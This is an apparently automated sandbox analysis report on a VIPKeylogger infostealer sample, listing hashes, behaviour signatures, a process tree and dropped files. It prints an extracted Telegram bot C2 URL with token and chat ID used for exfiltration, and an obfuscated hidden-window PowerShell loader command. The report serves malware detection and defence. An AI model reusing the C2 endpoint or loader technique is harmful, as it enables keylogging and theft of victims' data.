Analysis

  • max time kernel
    149s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-01-2025 14:15

General

  • Target

    f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe

  • Size

    560KB

  • MD5

    21eb0bfd14e8ab29a3c29d5b60ee09e1

  • SHA1

    9cff284042166495e20428500545b99330a1a9c8

  • SHA256

    f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba

  • SHA512

    cf0d15a179940c800cb669384a0874200650b0da7b8db58c3e1a8cf87cb5d3ac5953a10c68366436917812f24d32a7f12506831294bec53b6e41ed8a7b1a56e8

  • SSDEEP

    12288:n93jlz5CwkzUf1DYt/itWe7NAZSfR6IWAKsbk1B8B:n93jlzcxzUf9S6tx7mWKNeoiB

Malware Config

Extracted

Family

vipkeylogger

C2

https://api.telegram.org/bot7808466522:AAFleMCkdYBjkW3SQRMH5osM11THNEIFjRA/sendMessage?chat_id=7161037710

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Vipkeylogger family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Blocklisted process makes network request 11 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe
    "C:\Users\Admin\AppData\Local\Temp\f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2756
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\Admin\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3472
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:1172

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\justifikationssager.lnk

    Filesize

    756B

    MD5

    cb03115a3e717dd02fea6c900be8349d

    SHA1

    98e21b669efd85d0e27b5fc087d88b872000a05c

    SHA256

    c53ecd96e8d3cf8a3e7eb1cb882f3fef10d9cec3c86fa76323945e1f216afcd6

    SHA512

    eeafb6adae8e7e900442efde7d03b2f5a84837a1cb8bbae74ff21263f7d331df711d11a54855a5c557b7bf113e6be6acbc5958f8772b5f1f83bd0839cdc21a94

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_shrlbol0.uug.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\nsh8B79.tmp\nsExec.dll

    Filesize

    6KB

    MD5

    b648c78981c02c434d6a04d4422a6198

    SHA1

    74d99eed1eae76c7f43454c01cdb7030e5772fc2

    SHA256

    3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

    SHA512

    219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

  • C:\Users\Admin\AppData\Roaming\china\Mixeren\verbalises\Nondecreasing.Vgt

    Filesize

    336KB

    MD5

    8fb7148f8dbda5b61030f3dfb6d7fa25

    SHA1

    da981906695b80ce5e6c8f7e20e945e6a0899aa7

    SHA256

    f3266f0aa22192f9e01248a771505a0fe3c05ff63fc7a88ce56ade7d7af20903

    SHA512

    edf1b8a264fa98131933f3a5c734bbf1631941f648eeb89742c0c6cd43225d67bf99c221e7b23817a0c9f6de1f54887f4d1650db9805c459dbab007f1e5f514b

  • C:\Users\Admin\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove

    Filesize

    66KB

    MD5

    ea1e2a9f4de28839b57fe9978897843c

    SHA1

    b012c5ac62dbc1657062674e6ff102a2209ae777

    SHA256

    7c6bbb62d20bb41ff822a460afcc6cd4dc670453aa333558db29d53b7e6bb027

    SHA512

    ba127e3e91c4e233e778abdd86e59b5272023c99ed0c069361e3ae0b8d4e65a7d3f57887af7bb714f50df22572cb845088b67f4184254e6155bd196adc42537a

  • memory/1172-109-0x0000000000400000-0x0000000001654000-memory.dmp

    Filesize

    18.3MB

  • memory/1172-111-0x0000000000400000-0x000000000044A000-memory.dmp

    Filesize

    296KB

  • memory/1172-116-0x0000000022860000-0x0000000022D8C000-memory.dmp

    Filesize

    5.2MB

  • memory/1172-115-0x0000000021F90000-0x0000000021FE0000-memory.dmp

    Filesize

    320KB

  • memory/1172-114-0x0000000022160000-0x0000000022322000-memory.dmp

    Filesize

    1.8MB

  • memory/1172-112-0x0000000021510000-0x00000000215AC000-memory.dmp

    Filesize

    624KB

  • memory/1172-110-0x0000000000400000-0x0000000001654000-memory.dmp

    Filesize

    18.3MB

  • memory/3472-73-0x0000000007560000-0x0000000007603000-memory.dmp

    Filesize

    652KB

  • memory/3472-80-0x0000000007860000-0x0000000007868000-memory.dmp

    Filesize

    32KB

  • memory/3472-51-0x0000000005AC0000-0x0000000005E14000-memory.dmp

    Filesize

    3.3MB

  • memory/3472-52-0x0000000006110000-0x000000000612E000-memory.dmp

    Filesize

    120KB

  • memory/3472-53-0x0000000006150000-0x000000000619C000-memory.dmp

    Filesize

    304KB

  • memory/3472-54-0x00000000070C0000-0x0000000007156000-memory.dmp

    Filesize

    600KB

  • memory/3472-55-0x0000000006610000-0x000000000662A000-memory.dmp

    Filesize

    104KB

  • memory/3472-56-0x0000000006660000-0x0000000006682000-memory.dmp

    Filesize

    136KB

  • memory/3472-57-0x0000000007970000-0x0000000007F14000-memory.dmp

    Filesize

    5.6MB

  • memory/3472-59-0x00000000085A0000-0x0000000008C1A000-memory.dmp

    Filesize

    6.5MB

  • memory/3472-61-0x0000000070F40000-0x0000000070F8C000-memory.dmp

    Filesize

    304KB

  • memory/3472-71-0x00000000074F0000-0x000000000750E000-memory.dmp

    Filesize

    120KB

  • memory/3472-60-0x0000000007510000-0x0000000007542000-memory.dmp

    Filesize

    200KB

  • memory/3472-72-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-40-0x00000000059E0000-0x0000000005A46000-memory.dmp

    Filesize

    408KB

  • memory/3472-74-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-75-0x0000000007680000-0x000000000768A000-memory.dmp

    Filesize

    40KB

  • memory/3472-76-0x00000000077E0000-0x00000000077F1000-memory.dmp

    Filesize

    68KB

  • memory/3472-77-0x0000000007820000-0x000000000782E000-memory.dmp

    Filesize

    56KB

  • memory/3472-78-0x0000000007830000-0x0000000007844000-memory.dmp

    Filesize

    80KB

  • memory/3472-79-0x0000000007890000-0x00000000078AA000-memory.dmp

    Filesize

    104KB

  • memory/3472-41-0x0000000005A50000-0x0000000005AB6000-memory.dmp

    Filesize

    408KB

  • memory/3472-81-0x0000000007890000-0x00000000078BA000-memory.dmp

    Filesize

    168KB

  • memory/3472-82-0x00000000078C0000-0x00000000078E4000-memory.dmp

    Filesize

    144KB

  • memory/3472-83-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-84-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-87-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-86-0x000000007512E000-0x000000007512F000-memory.dmp

    Filesize

    4KB

  • memory/3472-88-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-89-0x0000000008C20000-0x000000000AC24000-memory.dmp

    Filesize

    32.0MB

  • memory/3472-90-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-91-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-92-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-93-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-39-0x00000000050D0000-0x00000000050F2000-memory.dmp

    Filesize

    136KB

  • memory/3472-38-0x0000000005340000-0x0000000005968000-memory.dmp

    Filesize

    6.2MB

  • memory/3472-37-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-36-0x0000000002AD0000-0x0000000002B06000-memory.dmp

    Filesize

    216KB

  • memory/3472-35-0x000000007512E000-0x000000007512F000-memory.dmp

    Filesize

    4KB

  • memory/3472-95-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3472-96-0x0000000075120000-0x00000000758D0000-memory.dmp

    Filesize

    7.7MB